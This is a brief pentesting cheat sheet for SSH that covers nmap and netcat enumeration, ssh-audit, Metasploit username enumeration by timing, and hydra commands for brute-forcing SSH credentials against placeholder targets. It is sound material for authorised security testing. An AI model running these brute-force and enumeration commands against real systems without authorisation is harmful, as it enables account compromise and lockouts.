SSH

Pentesting SSH - TCP Port 22

Theory

SSH or Secure Shell or Secure Socket Shell, is a network protocol that gives users a secure way to access a computer over an unsecured network.

SHH protocol operate by default on TCP port 22

Practice

Enumerate SSH server

We can use nmap to enumerate informations about the running SSH server

# Send default nmap scripts for SSH and retreive version
nmap -p22 <ip> -sC -sV

# Send all nmap ssh related scripts
nmap -p22 <ip> --script ssh-*

# Retrieve supported algorythms 
nmap -p22 <ip> --script ssh2-enum-algos

# Retrieve weak keys
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full

# Check authentication methods for an user
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root"

We can use Netcat to enumerate the SSH server banner

nc -vn <IP> 22

ssh-audit (python) may be used for ssh server & client configuration auditing.

#Basic audit
python ssh-audit.py <IP>

Enumerate Users

In some versions of OpenSSH you can make a timing attack to enumerate users. You can use a metasploit module in order to exploit this:

msfconsole
msf> use auxiliary/scanner/ssh/ssh_enumusers

Brute-Force Credentials

If the target host opens port 80 or 443, you can generate wordlist from the contents of the website then use it with your tool.

When bruteforcing accounts, you may lock accounts

# -t : Number of tasks
# -L/l : username list / username 
# -P/p : password list / password
hydra -l username -P passwords.txt <target-ip> ssh -t 4
hydra -L usernames.txt -p password <target-ip> ssh -t 4

# -s : Specific port
hydra -l username -P passwords.txt -s 2222 <target-ip> ssh -t 4
hydra -l username -P passwords.txt ssh://<target-ip>:2222 -t 4